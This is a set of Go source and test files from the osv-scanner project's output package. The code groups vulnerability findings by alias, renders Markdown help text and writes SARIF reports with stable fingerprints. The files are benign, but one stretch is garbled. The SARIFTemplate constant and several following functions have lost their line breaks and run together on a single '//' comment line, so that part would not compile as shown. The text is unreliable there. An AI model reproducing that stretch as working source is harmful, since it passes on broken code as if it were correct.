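func (pss *pkgSourceSet) StableKeys() []pkgWithSource {
	pkgWithSrcKeys := slices.AppendSeq(make([]pkgWithSource, 0, len(*pss)), maps.Keys(*pss))

	slices.SortFunc(pkgWithSrcKeys, func(a, b pkgWithSource) int {
		// compare based on each field in descending priority
		for _, fn := range []func() int{
			func() int { return strings.Compare(a.Source.Path, b.Source.Path) },
			func() int { return strings.Compare(a.Package.Name, b.Package.Name) },
			func() int { return strings.Compare(a.Package.Version, b.Package.Version) },
		} {
			if r := fn(); r != 0 {
				return r
			}
		}

		return 0
	})

	return pkgWithSrcKeys
}

// MarshalJSON serializes the set as a JSON array of its keys.
// The keys are emitted in StableKeys order so that the same set serializes the
// same way on every run instead of following map iteration order.
func (pss *pkgSourceSet) MarshalJSON() ([]byte, error) {
	return json.Marshal(pss.StableKeys())
}

// UnmarshalJSON rebuilds the set from a JSON array of pkgWithSource values.
// Any previous content of the set is discarded.
func (pss *pkgSourceSet) UnmarshalJSON(data []byte) error {
	aux := []pkgWithSource{}
	if err := json.Unmarshal(data, &aux); err != nil {
		return err
	}

	*pss = make(pkgSourceSet)
	for _, pws := range aux {
		(*pss)[pws] = struct{}{}
	}

	return nil
}

// mustGetWorkingDirectory panics if it can't get the working directory
func mustGetWorkingDirectory() string {
	dir, err := os.Getwd()
	if err != nil {
		log.Panicf("can't get working dir: %v", err)
	}

	return dir
}

// groupFixedVersions builds the fixed versions for each ID Group, with keys formatted like so:
// `Source:ID`
//
// Entries without a vulnerability record are skipped. Each returned list is
// sorted and free of duplicates.
func groupFixedVersions(flattened []models.VulnerabilityFlattened) map[string][]string {
	groupedFixedVersions := map[string][]string{}

	// Get the fixed versions indexed by each group of vulnerabilities
	// Prepend source path as same vulnerability in two projects should be counted twice
	// Remember to sort and compact before displaying later
	for _, vf := range flattened {
		if vf.Vulnerability == nil {
			continue
		}

		groupIdx := vf.Source.String() + ":" + vf.GroupInfo.IndexString()
		pkg := vulns.PackageKey{
			Ecosystem: vf.Package.Ecosystem,
			Name:      vf.Package.Name,
		}
		groupedFixedVersions[groupIdx] = append(groupedFixedVersions[groupIdx], vulns.GetFixedVersions(vf.Vulnerability)[pkg]...)
	}

	// Remove duplicates
	for k := range groupedFixedVersions {
		fixedVersions := groupedFixedVersions[k]
		slices.Sort(fixedVersions)
		groupedFixedVersions[k] = slices.Compact(fixedVersions)
	}

	return groupedFixedVersions
}

// groupedSARIFFinding groups vulnerabilities by aliases
type groupedSARIFFinding struct {
	// DisplayID is the first element of AliasedIDList, or empty when that list is empty
	DisplayID string
	PkgSource pkgSourceSet
	// AliasedVulns contains vulns that are OSV vulnerabilities
	AliasedVulns map[string]*osvschema.Vulnerability
	// AliasedIDList contains all aliased IDs, including ones that are not OSV (e.g. CVE IDs)
	// Sorted by idSortFunc, therefore the first element will be the display ID
	AliasedIDList []string
}

// UnmarshalJSON implements the json.unmarshaler interface.
// It is required because the AliasedVulns field is a proto message,
// which requires protojson to unmarshal, while the rest of the struct uses
// the standard encoding/json library.
func (g *groupedSARIFFinding) UnmarshalJSON(data []byte) error {
	// Use alias to avoid recursion.
	type alias groupedSARIFFinding

	// Use temporary struct to combine standard fields (via alias)
	// and the manually processed field (via shadowing).
	tmp := &struct {
		*alias

		AliasedVulns map[string]json.RawMessage `json:"AliasedVulns"`
	}{
		alias: (*alias)(g),
	}

	if err := json.Unmarshal(data, &tmp); err != nil {
		return err
	}

	// Manually process the custom field from RawMessage format.
	if tmp.AliasedVulns != nil {
		g.AliasedVulns = make(map[string]*osvschema.Vulnerability, len(tmp.AliasedVulns))
		for id, rawVuln := range tmp.AliasedVulns {
			var vuln osvschema.Vulnerability
			if err := protojson.Unmarshal(rawVuln, &vuln); err != nil {
				return fmt.Errorf("failed to protojson unmarshal vuln %q: %w", id, err)
			}
			g.AliasedVulns[id] = &vuln
		}
	}

	return nil
}

// MarshalJSON implements the json.Marshaler interface.
// It is required because the AliasedVulns field is a proto message,
// which requires protojson to marshal, while the rest of the struct uses
// the standard encoding/json library.
func (g *groupedSARIFFinding) MarshalJSON() ([]byte, error) {
	// Use alias to avoid recursion.
	type alias groupedSARIFFinding

	// Pre-process the custom field into standardized RawMessage format.
	var rawVulns map[string]json.RawMessage
	if g.AliasedVulns != nil {
		rawVulns = make(map[string]json.RawMessage, len(g.AliasedVulns))
		for id, vuln := range g.AliasedVulns {
			unstableJSON, err := protojson.Marshal(vuln)
			if err != nil {
				return nil, fmt.Errorf("failed to marshal vuln %q: %w", id, err)
			}

			// Round-trip the protojson bytes through encoding/json so the
			// stored form is produced by encoding/json's own formatter.
			// (A distinct name is used here; the original shadowed the loop
			// variable vuln.)
			var generic any
			if err := json.Unmarshal(unstableJSON, &generic); err != nil {
				return nil, err
			}
			b, err := json.MarshalIndent(generic, "", " ")
			if err != nil {
				return nil, err
			}
			rawVulns[id] = b
		}
	}

	// Use temporary struct to combine standard fields (via alias)
	// and the manually processed field (via shadowing).
	return json.Marshal(&struct {
		*alias

		AliasedVulns map[string]json.RawMessage `json:"AliasedVulns"`
	}{
		alias:        (*alias)(g),
		AliasedVulns: rawVulns,
	})
}

// mapIDsToGroupedSARIFFinding creates a map over all vulnerability IDs, with aliased vuln IDs
// pointing to the same groupedSARIFFinding object
//
// The input is not assumed to be internally consistent: a vulnerability whose
// ID appears in none of its package's groups gets a finding of its own, nil
// vulnerability entries are skipped, and a group for which no vulnerability
// record was seen keeps an empty DisplayID. Before these guards, each of those
// inputs ended in a nil dereference or an index-out-of-range panic.
func mapIDsToGroupedSARIFFinding(vulnResults *models.VulnerabilityResults) map[string]*groupedSARIFFinding {
	// Map of vuln IDs to their respective groupedSARIFFinding
	results := map[string]*groupedSARIFFinding{}

	newFinding := func() *groupedSARIFFinding {
		return &groupedSARIFFinding{
			PkgSource:    make(pkgSourceSet),
			AliasedVulns: make(map[string]*osvschema.Vulnerability),
		}
	}

	for _, res := range vulnResults.Results {
		for _, pkg := range res.Packages {
			for _, gi := range pkg.Groups {
				var data *groupedSARIFFinding
				// See if this vulnerability group already exists (from another package or source)
				for _, id := range gi.IDs {
					existingData, ok := results[id]
					if ok {
						data = existingData
						break
					}
				}
				// If not create this group
				if data == nil {
					data = newFinding()
				}
				// Point all the IDs of the same group to the same data, either newly created or existing
				for _, id := range gi.IDs {
					results[id] = data
				}
			}

			for _, v := range pkg.Vulnerabilities {
				if v == nil {
					continue
				}

				newPkgSource := pkgWithSource{
					Package: pkg.Package,
					Source:  res.Source,
				}
				entry := results[v.GetId()]
				if entry == nil {
					// Not covered by any group of this package: report it as
					// its own finding rather than dropping it or panicking.
					entry = newFinding()
					results[v.GetId()] = entry
				}
				entry.PkgSource[newPkgSource] = struct{}{}
				entry.AliasedVulns[v.GetId()] = v
				entry.AliasedIDList = append(entry.AliasedIDList, v.GetId())
				entry.AliasedIDList = append(entry.AliasedIDList, v.GetAliases()...)
			}
		}
	}

	// A finding is reachable through every ID of its group, so it may be
	// visited more than once here; sorting and compacting again is harmless.
	for _, gs := range results {
		slices.SortFunc(gs.AliasedIDList, identifiers.IDSortFunc)
		gs.AliasedIDList = slices.Compact(gs.AliasedIDList)
		if len(gs.AliasedIDList) == 0 {
			// No vulnerability record was attached to this group.
			continue
		}
		gs.DisplayID = gs.AliasedIDList[0]
	}

	return results
}

================================================
FILE: internal/output/result_test.go
================================================
package output

import (
	"testing"

	"github.com/google/osv-scanner/v2/internal/testutility"
	"github.com/google/osv-scanner/v2/pkg/models"
)

func Test_groupFixedVersions(t *testing.T) {
	t.Parallel()

	tests := []struct {
		name string
		args []models.VulnerabilityFlattened
		want testutility.Snapshot
	}{
		{
			name: "",
			args: testutility.LoadJSONFixture[[]models.VulnerabilityFlattened](t, "testdata/flattened_vulns.json"),
			want: testutility.NewSnapshot(),
		},
		{
			name: "",
			args: testutility.LoadJSONFixtureWithWindowsReplacements[[]models.VulnerabilityFlattened](t,
				"testdata/flattened_vulns.json",
				map[string]string{
					"/path/to/scorecard-check-osv-e2e/sub-rust-project/Cargo.lock": "D:\\\\path\\\\to\\\\scorecard-check-osv-e2e\\\\sub-rust-project\\\\Cargo.lock",
					"/path/to/scorecard-check-osv-e2e/go.mod":                      "D:\\\\path\\\\to\\\\scorecard-check-osv-e2e\\\\go.mod",
				},
			),
			want: testutility.NewSnapshot().WithWindowsReplacements(
				map[string]string{
					"D:\\\\path\\\\to\\\\scorecard-check-osv-e2e\\\\sub-rust-project\\\\Cargo.lock": "/path/to/scorecard-check-osv-e2e/sub-rust-project/Cargo.lock",
					"D:\\\\path\\\\to\\\\scorecard-check-osv-e2e\\\\go.mod":                         "/path/to/scorecard-check-osv-e2e/go.mod",
				},
			),
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()
			got := groupFixedVersions(tt.args)
			tt.want.MatchJSON(t, got)
		})
	}
}

func Test_mapIDsToGroupedSARIFFinding(t *testing.T) {
	t.Parallel()

	tests := []struct {
		name string
		args models.VulnerabilityResults
		want testutility.Snapshot
	}{
		{
			args: testutility.LoadJSONFixtureWithWindowsReplacements[models.VulnerabilityResults](t,
				"testdata/test-vuln-results-a.json",
				map[string]string{
					"/path/to/sub-rust-project/Cargo.lock": "D:\\\\path\\\\to\\\\sub-rust-project\\\\Cargo.lock",
					"/path/to/go.mod":                      "D:\\\\path\\\\to\\\\go.mod",
				},
			),
			want: testutility.NewSnapshot().WithWindowsReplacements(
				map[string]string{
					"D:\\\\path\\\\to\\\\sub-rust-project\\\\Cargo.lock": "/path/to/sub-rust-project/Cargo.lock",
					"D:\\\\path\\\\to\\\\go.mod":                         "/path/to/go.mod",
				},
			),
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()
			got := mapIDsToGroupedSARIFFinding(&tt.args)
			tt.want.MatchJSON(t, got)
		})
	}
}

================================================
FILE: internal/output/sarif.go
================================================
package output

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"io"
	"log"
	"path/filepath"
	"slices"
	"strconv"
	"strings"
	"text/template"

	"github.com/google/osv-scanner/v2/internal/identifiers"
	"github.com/google/osv-scanner/v2/internal/url"
	"github.com/google/osv-scanner/v2/internal/utility/results"
	"github.com/google/osv-scanner/v2/internal/utility/severity"
	"github.com/google/osv-scanner/v2/internal/utility/vulns"
	"github.com/google/osv-scanner/v2/internal/version"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/jedib0t/go-pretty/v6/table"
	"github.com/owenrumney/go-sarif/v3/pkg/report/v210/sarif"
)

// HelpTemplateData is the data passed to SARIFTemplate when the help text of a
// SARIF rule is rendered.
type HelpTemplateData struct {
	ID                    string
	AffectedPackagesTable string
	AffectedPackagePaths  []string
	AliasedVulns          []VulnDescription
	HasFixedVersion       bool
	FixedVersionTable     string
	PathSeparator         string
}

// FixedPkgTableData is one row of the "Fixed Versions" table in the help text.
type FixedPkgTableData struct {
	VulnID       string
	PackageName  string
	FixedVersion string
}

// VulnDescription carries the ID and details text of one advisory for the help text.
type VulnDescription struct {
	ID      string
	Details string
}

// SARIFTemplate is used as the help text for findings.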
// // Note that double double-quotes are ("") are used to represent a single backtick (`)`, // since backticks cannot be escaped in raw strings const SARIFTemplate = ` **Your dependency is vulnerable to [{{.ID}}](https://osv.dev/{{.ID}})** {{- if gt (len .AliasedVulns) 1 }} (Also published as: {{range .AliasedVulns -}} {{if ne .ID $.ID -}} [{{.ID}}](https://osv.dev/{{.ID}}), {{end}}{{end}}) {{- end}}. {{range .AliasedVulns -}} ## [{{.ID}}](https://osv.dev/{{.ID}})
Details > {{.Details}}
{{end -}} --- ### Affected Packages {{.AffectedPackagesTable}} ## Remediation {{- if .HasFixedVersion }} To fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below. ### Fixed Versions {{.FixedVersionTable}} {{- end}} If you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an ""osv-scanner.toml"" file located in the same directory as the lockfile containing the vulnerable dependency. See the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/ Add or append these values to the following config files to ignore this vulnerability: {{range .AffectedPackagePaths -}} ""{{.}}{{$.PathSeparator}}osv-scanner.toml"" """""" [[IgnoredVulns]] id = "{{$.ID}}" reason = "Your reason for ignoring this vulnerability" """""" {{end}} ` // createSARIFAffectedPkgTable creates a vulnerability table which includes the affected versions for a specific source file func createSARIFAffectedPkgTable(pkgWithSrc []pkgWithSource) table.Writer { helpTable := table.NewWriter() headerRow := table.Row{"Source", "Package Name", "Package Version"} hasDeprecated := false for _, ps := range pkgWithSrc { if ps.Package.Deprecated { hasDeprecated = true break } } if hasDeprecated { headerRow = append(headerRow, "Deprecated") } helpTable.AppendHeader(headerRow) for _, ps := range pkgWithSrc { ver := ps.Package.Version if ps.Package.Commit != "" { ver = ps.Package.Commit } row := table.Row{ ps.Source.String(), ps.Package.Name, ver, } if hasDeprecated { row = append(row, ps.Package.Deprecated) } helpTable.AppendRow(row) } return helpTable } // createSARIFFixedPkgTable creates a vulnerability table which includes the fixed versions for a specific source file func createSARIFFixedPkgTable(fixedPkgTableData []FixedPkgTableData) table.Writer { helpTable := table.NewWriter() helpTable.AppendHeader(table.Row{"Vulnerability ID", "Package Name", "Fixed Version"}) 
slices.SortFunc(fixedPkgTableData, func(a, b FixedPkgTableData) int { return strings.Compare(a.VulnID, b.VulnID) }) for _, data := range fixedPkgTableData { helpTable.AppendRow(table.Row{ data.VulnID, data.PackageName, data.FixedVersion, }) } return helpTable } // stripGitHubWorkspace strips /github/workspace/ from the given path. func stripGitHubWorkspace(path string) string { return strings.TrimPrefix(path, "/github/workspace/") } // createSARIFFingerprint generates a stable fingerprint for a SARIF result // to help GitHub deduplicate findings across scans. // // The fingerprint is computed from three components to ensure uniqueness while maintaining stability: // 1. vulnID: The vulnerability identifier (e.g., "CVE-2022-24713") - ensures different vulnerabilities // produce different fingerprints even for the same package // 2. artifactPath: The path to the lockfile (e.g., "/path/to/package.json") - distinguishes the same // vulnerability in different parts of a monorepo or different projects // 3. pkg: The package information (name, version, or commit) - differentiates the same vulnerability // across different versions or instances of a package // // These three components are combined because they uniquely identify a specific vulnerability finding: // the same vulnerability (vulnID) in the same package (pkg) detected in the same location (artifactPath) // should always be considered the same finding and produce the same fingerprint across scans. 
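func createSARIFFingerprint(vulnID string, artifactPath string, pkg models.PackageInfo) string {
	// Create a stable string representation
	//
	// NOTE(review): the three parts are joined with ':' and none of them is
	// escaped, while artifactPath can itself contain ':' (PrintSARIFReport
	// passes a file URL for absolute paths). The pre-hash string is therefore
	// not an unambiguous encoding of the tuple. The format is kept as is,
	// because changing it would change every fingerprint and stop alerts
	// from matching those of earlier scans.
	pkgStr := results.PkgToString(pkg)
	fingerprintData := fmt.Sprintf("%s:%s:%s", vulnID, artifactPath, pkgStr)

	// Hash the data to create a stable fingerprint
	hash := sha256.Sum256([]byte(fingerprintData))

	return hex.EncodeToString(hash[:])
}

// createSARIFHelpText returns the text for SARIF rule's help field
//
// The text is rendered from SARIFTemplate with text/template, which performs
// no escaping: advisory details reach the Markdown output as they are, apart
// from the "> " prefix added to each line to keep them inside a blockquote.
// How that Markdown is displayed is up to the SARIF consumer.
//
// It panics if the template cannot be parsed or executed.
func createSARIFHelpText(gv *groupedSARIFFinding) string {
	// SARIFTemplate writes "" where it means a backtick; convert them here.
	backtickSARIFTemplate := strings.ReplaceAll(strings.TrimSpace(SARIFTemplate), `""`, "`")
	helpTextTemplate, err := template.New("helpText").Parse(backtickSARIFTemplate)
	if err != nil {
		log.Panicf("failed to parse sarif help text template: %v", err)
	}

	vulnDescriptions := []VulnDescription{}
	fixedPkgTableData := []FixedPkgTableData{}

	hasFixedVersion := false
	for _, v := range gv.AliasedVulns {
		if v == nil {
			continue
		}
		for p, v2 := range vulns.GetFixedVersions(v) {
			slices.Sort(v2)
			fixedPkgTableData = append(fixedPkgTableData, FixedPkgTableData{
				PackageName:  p.Name,
				FixedVersion: strings.Join(slices.Compact(v2), ", "),
				VulnID:       v.GetId(),
			})
			hasFixedVersion = true
		}

		vulnDescriptions = append(vulnDescriptions, VulnDescription{
			ID: v.GetId(),
			// Continue the Markdown blockquote on every line of the details.
			Details: strings.ReplaceAll(v.GetDetails(), "\n", "\n> "),
		})
	}
	slices.SortFunc(vulnDescriptions, func(a, b VulnDescription) int { return identifiers.IDSortFunc(a.ID, b.ID) })

	helpText := strings.Builder{}

	pkgWithSrcKeys := gv.PkgSource.StableKeys()

	affectedPackagePaths := []string{}
	for _, pws := range pkgWithSrcKeys {
		affectedPackagePaths = append(affectedPackagePaths, stripGitHubWorkspace(filepath.Dir(pws.Source.Path)))
	}
	// Compact to remove duplicates
	// (which should already be next to each other since it's sorted in the previous step)
	affectedPackagePaths = slices.Compact(affectedPackagePaths)

	err = helpTextTemplate.Execute(&helpText, HelpTemplateData{
		ID:                    gv.DisplayID,
		AffectedPackagesTable: createSARIFAffectedPkgTable(pkgWithSrcKeys).RenderMarkdown(),
		AliasedVulns:          vulnDescriptions,
		HasFixedVersion:       hasFixedVersion,
		FixedVersionTable:     createSARIFFixedPkgTable(fixedPkgTableData).RenderMarkdown(),
		AffectedPackagePaths:  affectedPackagePaths,
		PathSeparator:         string(filepath.Separator),
	})
	if err != nil {
		// The original message omitted the error, leaving the panic without a cause.
		log.Panicf("failed to execute sarif help text template: %v", err)
	}

	return helpText.String()
}

// PrintSARIFReport prints SARIF output to outputWriter
//
// It returns the error of the first failed write; this includes the trailing
// newline, whose write error used to be discarded.
func PrintSARIFReport(vulnResult *models.VulnerabilityResults, outputWriter io.Writer) error {
	report := sarif.NewReport()

	run := sarif.NewRunWithInformationURI("osv-scanner", "https://github.com/google/osv-scanner")
	run.Tool.Driver.WithVersion(version.OSVVersion)

	vulnIDMap := mapIDsToGroupedSARIFFinding(vulnResult)
	// Sort the IDs to have deterministic loop of vulnIDMap
	vulnIDs := make([]string, 0, len(vulnIDMap))
	for vulnID := range vulnIDMap {
		vulnIDs = append(vulnIDs, vulnID)
	}
	slices.Sort(vulnIDs)

	// NOTE(review): vulnIDMap maps every ID of a group to the same finding, so
	// a group with several IDs is visited once per ID. Confirm that AddRule
	// and CreateResultForRule do not emit the rule and its results again on
	// the later visits.
	for _, vulnID := range vulnIDs {
		gv := vulnIDMap[vulnID]
		if gv == nil {
			continue
		}

		helpText := createSARIFHelpText(gv)

		// Pick the "best" description from the alias group based on the source.
		// Set short description to the first entry with a non-empty summary
		// Set long description to the same entry as short description,
		// or, when no entry has a summary, to the details of the last entry examined.
		var shortDescription, longDescription string
		ids := slices.Clone(gv.AliasedIDList)
		slices.SortFunc(ids, identifiers.IDSortFuncForDescription)

		for _, id := range ids {
			v := gv.AliasedVulns[id]
			if v == nil {
				continue
			}
			longDescription = v.GetDetails()
			if v.GetSummary() != "" {
				shortDescription = fmt.Sprintf("%s: %s", gv.DisplayID, v.GetSummary())
				break
			}
		}

		// If no advisory for this vulnerability has a summary field,
		// just show the ID in the shortDescription
		if shortDescription == "" {
			shortDescription = gv.DisplayID
		}

		rule := run.AddRule(gv.DisplayID)
		if rule == nil {
			// Skipping SARIF rule for empty ID
			continue
		}
		rule.WithName(gv.DisplayID).
			WithShortDescription(sarif.NewMultiformatMessageString().WithText(shortDescription).WithMarkdown(shortDescription)).
			WithFullDescription(sarif.NewMultiformatMessageString().WithText(longDescription).WithMarkdown(longDescription)).
			WithMarkdownHelp(helpText)

		// Find the worst severity score
		// (-1 marks "no score found"; the other return values of
		// CalculateOverallScore are ignored here)
		var worstScore float64 = -1
		for _, v := range gv.AliasedVulns {
			if v == nil || v.GetSeverity() == nil {
				continue
			}
			score, _, _ := severity.CalculateOverallScore(v.GetSeverity())
			if score > worstScore {
				worstScore = score
			}
		}

		if worstScore >= 0 {
			var bag = sarif.NewPropertyBag()
			bag.Add("security-severity", strconv.FormatFloat(worstScore, 'f', -1, 64))
			rule.WithProperties(bag)
		}

		if gv.AliasedIDList == nil {
			gv.AliasedIDList = []string{}
		}
		rule.DeprecatedIds = gv.AliasedIDList

		for _, pws := range gv.PkgSource.StableKeys() {
			artifactPath := stripGitHubWorkspace(pws.Source.Path)
			if filepath.IsAbs(artifactPath) {
				// this only errors if the file path is not absolute,
				// which we've already confirmed is not the case
				p, err := url.FromFilePath(artifactPath)
				if err == nil && p != nil {
					artifactPath = p.String()
				}
			}

			run.AddDistinctArtifact(artifactPath)

			alsoKnownAsStr := ""
			if len(gv.AliasedIDList) > 1 {
				alsoKnownAsStr = fmt.Sprintf(" (also known as '%s')", strings.Join(gv.AliasedIDList[1:], "', '"))
			}

			// Generate a stable fingerprint for deduplication
			fingerprint := createSARIFFingerprint(gv.DisplayID, artifactPath, pws.Package)

			run.CreateResultForRule(gv.DisplayID).
				WithLevel("warning").
				WithMessage(
					sarif.NewTextMessage(
						fmt.Sprintf(
							"Package '%s' is vulnerable to '%s'%s.",
							results.PkgToString(pws.Package),
							gv.DisplayID,
							alsoKnownAsStr,
						))).
				AddLocation(
					sarif.NewLocationWithPhysicalLocation(
						sarif.NewPhysicalLocation().
							WithArtifactLocation(sarif.NewSimpleArtifactLocation(artifactPath)),
					)).
				WithPartialFingerprints(map[string]string{
					// Use "primaryLocationLineHash" as the key for the fingerprint.
					// This is the standard key that GitHub Advanced Security uses to deduplicate
					// code scanning alerts across multiple runs.
					//
					// Reference: https://docs.github.com/en/code-security/code-scanning/integrating-with-code-scanning/sarif-support-for-code-scanning#preventing-duplicate-alerts-using-fingerprints
					//
					// GitHub's documentation states: "GitHub uses the primaryLocationLineHash property
					// to detect results that are logically the same, so they can be shown only once,
					// in the correct branch and pull request."
					//
					// For dependency scanning (as opposed to source code analysis), we don't have
					// line numbers in the traditional sense, so our fingerprint is based on the
					// combination of vulnerability ID, package, and location rather than source code lines.
					"primaryLocationLineHash": fingerprint,
				})
		}
	}

	report.AddRun(run)

	err := report.PrettyWrite(outputWriter)
	if err != nil {
		return err
	}

	// Terminate the report with a newline and surface a failed write.
	_, err = fmt.Fprintln(outputWriter)

	return err
}

================================================
FILE: internal/output/sarif_fingerprint_test.go
================================================
package output

import (
	"fmt"
	"testing"

	"github.com/google/osv-scanner/v2/pkg/models"
)

// Common test parameter values used by both test functions
var (
	testVulnIDs       = []string{"CVE-2021-1234", "CVE-2022-5678"}
	testArtifactPaths = []string{"/path/to/package.json", "/different/path/go.mod"}
	testPackages      = []models.PackageInfo{
		{Name: "pkg1", Version: "1.0.0"},
		{Name: "pkg2", Version: "1.0.0"},
		{Name: "pkg1", Version: "2.0.0"},
		{Name: "pkg1", Commit: "abc123"},
	}
)

func Test_createSARIFFingerprint(t *testing.T) {
	t.Parallel()

	// Generate all combinations from common test parameters
	for i, vulnID := range testVulnIDs {
		for j, artifactPath := range testArtifactPaths {
			for k, pkg := range testPackages {
				testName := fmt.Sprintf("vuln_%d_path_%d_pkg_%d", i, j, k)
				t.Run(testName, func(t *testing.T) {
					t.Parallel()

					got := createSARIFFingerprint(vulnID, artifactPath, pkg)

					// Verify it returns a 64-character hex string (SHA-256 produces 32 bytes = 64 hex chars)
					if len(got) != 64 {
						t.Errorf("createSARIFFingerprint() returned fingerprint of length %d, want 64", len(got))
					}

					// Verify determinism by calling it again with the same inputs
					got2 := createSARIFFingerprint(vulnID, artifactPath, pkg)
					if got != got2 {
						t.Errorf("createSARIFFingerprint() is not deterministic: first call = %v, second call = %v", got, got2)
					}
				})
			}
		}
	}
}

func Test_createSARIFFingerprint_DifferentInputs(t *testing.T) {
	t.Parallel()

	// Generate all combinations from common test parameters and their fingerprints
	type testCase struct {
		vulnID       string
		artifactPath string
		pkg          models.PackageInfo
		fingerprint  string
	}

	testCases := make([]testCase, 0, len(testPackages)*len(testArtifactPaths)*len(testVulnIDs))
	for _, vulnID := range testVulnIDs {
		for _, artifactPath := range testArtifactPaths {
			for _, pkg := range testPackages {
				fp := createSARIFFingerprint(vulnID, artifactPath, pkg)
				testCases = append(testCases, testCase{
					vulnID:       vulnID,
					artifactPath: artifactPath,
					pkg:          pkg,
					fingerprint:  fp,
				})
			}
		}
	}

	// Verify that all fingerprints are unique
	for i := range testCases {
		for j := i + 1; j < len(testCases); j++ {
			if testCases[i].fingerprint == testCases[j].fingerprint {
				t.Errorf("Expected different fingerprints but got same:\n"+
					" Input 1: vulnID=%q, path=%q, pkg=%+v\n"+
					" Input 2: vulnID=%q, path=%q, pkg=%+v\n"+
					" Fingerprint: %s",
					testCases[i].vulnID, testCases[i].artifactPath, testCases[i].pkg,
					testCases[j].vulnID, testCases[j].artifactPath, testCases[j].pkg,
					testCases[i].fingerprint)
			}
		}
	}
}

================================================
FILE: internal/output/sarif_internal_test.go
================================================
package output

import (
	"testing"

	"github.com/google/osv-scanner/v2/internal/testutility"
)

func Test_createSARIFHelpText(t *testing.T) {
	t.Parallel()

	tests := []struct {
		name string
		args groupedSARIFFinding
		want testutility.Snapshot
	}{
		{
			args: testutility.LoadJSONFixture[groupedSARIFFinding](t, "testdata/vuln-grouped.json"),
			want: testutility.NewSnapshot().WithWindowsReplacements(map[string]string{
				"\\path\\to\\sub-rust-project\\osv-scanner.toml": "/path/to/sub-rust-project/osv-scanner.toml",
			}),
		},
		{
			args: testutility.LoadJSONFixture[groupedSARIFFinding](t, "testdata/commit-grouped.json"),
			want: testutility.NewSnapshot().WithWindowsReplacements(map[string]string{
				"\\Documents\\Project\\engine\\osv-scanner.toml": "/Documents/Project/engine/osv-scanner.toml",
			}),
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()
			got := createSARIFHelpText(&tt.args)
			tt.want.MatchText(t, got)
		})
	}
}

================================================
FILE: internal/output/sarif_test.go
================================================
package output_test

import (
	"bytes"
	"encoding/json"
	"strings"
	"testing"

	"github.com/google/osv-scanner/v2/internal/output"
	"github.com/google/osv-scanner/v2/internal/testutility"
	"github.com/google/osv-scanner/v2/pkg/models"
)

func TestPrintSARIFReport(t *testing.T) {
	t.Parallel()

	tests := []struct {
		name string
		args models.VulnerabilityResults
		want testutility.Snapshot
	}{
		{
			name: "",
			args: testutility.LoadJSONFixtureWithWindowsReplacements[models.VulnerabilityResults](t,
				"testdata/test-vuln-results-a.json",
				map[string]string{
					"/path/to/sub-rust-project/Cargo.lock": "D:\\\\path\\\\to\\\\sub-rust-project\\\\Cargo.lock",
					"/path/to/go.mod":                      "D:\\\\path\\\\to\\\\go.mod",
				},
			),
			want: testutility.NewSnapshot().WithWindowsReplacements(
				map[string]string{
					"lockfile:D:\\\\path\\\\to\\\\sub-rust-project\\\\Cargo.lock": "lockfile:/path/to/sub-rust-project/Cargo.lock",
					"lockfile:D:\\\\path\\\\to\\\\go.mod":                         "lockfile:/path/to/go.mod",
					"D:\\\\path\\\\to\\\\sub-rust-project\\\\osv-scanner.toml":    "/path/to/sub-rust-project/osv-scanner.toml",
					"D:\\\\path\\\\to\\\\osv-scanner.toml":                        "/path/to/osv-scanner.toml",
					"file:///D:/path/to":                                          "file:///path/to",
				},
			),
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()

			jsonStructure := buildJSONSarifReport(t, &tt.args)
			tt.want.MatchJSON(t, jsonStructure)
		})
	}
}

func TestPrintSARIFReport_WithVulnerabilities(t *testing.T) {
	t.Parallel()

	cwd := testutility.GetCurrentWorkingDirectory(t)

	testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		jsonStructure := buildJSONSarifReport(t, args.vulnResult)
		testutility.NewSnapshot().WithWindowsReplacements(
			map[string]string{
				strings.ReplaceAll(cwd, "\\", "\\\\"):                  strings.ReplaceAll(cwd, "\\", "/"),
				"\\\\path\\\\to\\\\my\\\\first\\\\osv-scanner.toml":  "/path/to/my/first/osv-scanner.toml",
				"\\\\path\\\\to\\\\my\\\\second\\\\osv-scanner.toml": "/path/to/my/second/osv-scanner.toml",
				"\\\\path\\\\to\\\\my\\\\third\\\\osv-scanner.toml":  "/path/to/my/third/osv-scanner.toml",
			}).MatchJSON(t, jsonStructure)
	})
}

func TestPrintSARIFReport_WithLicenseViolations(t *testing.T) {
	t.Parallel()

	cwd := testutility.GetCurrentWorkingDirectory(t)

	testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		jsonStructure := buildJSONSarifReport(t, args.vulnResult)
		testutility.NewSnapshot().WithWindowsReplacements(
			map[string]string{
				strings.ReplaceAll(cwd, "\\", "\\\\"):                  strings.ReplaceAll(cwd, "\\", "/"),
				"\\\\path\\\\to\\\\my\\\\first\\\\osv-scanner.toml":  "/path/to/my/first/osv-scanner.toml",
				"\\\\path\\\\to\\\\my\\\\second\\\\osv-scanner.toml": "/path/to/my/second/osv-scanner.toml",
				"\\\\path\\\\to\\\\my\\\\third\\\\osv-scanner.toml":  "/path/to/my/third/osv-scanner.toml",
			}).MatchJSON(t, jsonStructure)
	})
}

func TestPrintSARIFReport_WithMixedIssues(t *testing.T) {
	t.Parallel()

	cwd := testutility.GetCurrentWorkingDirectory(t)

	testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		jsonStructure := buildJSONSarifReport(t, args.vulnResult)
		testutility.NewSnapshot().WithWindowsReplacements(
			map[string]string{
				strings.ReplaceAll(cwd, "\\", "\\\\"):                  strings.ReplaceAll(cwd, "\\", "/"),
				"\\\\path\\\\to\\\\my\\\\first\\\\osv-scanner.toml":  "/path/to/my/first/osv-scanner.toml",
				"\\\\path\\\\to\\\\my\\\\second\\\\osv-scanner.toml": "/path/to/my/second/osv-scanner.toml",
				"\\\\path\\\\to\\\\my\\\\third\\\\osv-scanner.toml":  "/path/to/my/third/osv-scanner.toml",
			}).MatchJSON(t, jsonStructure)
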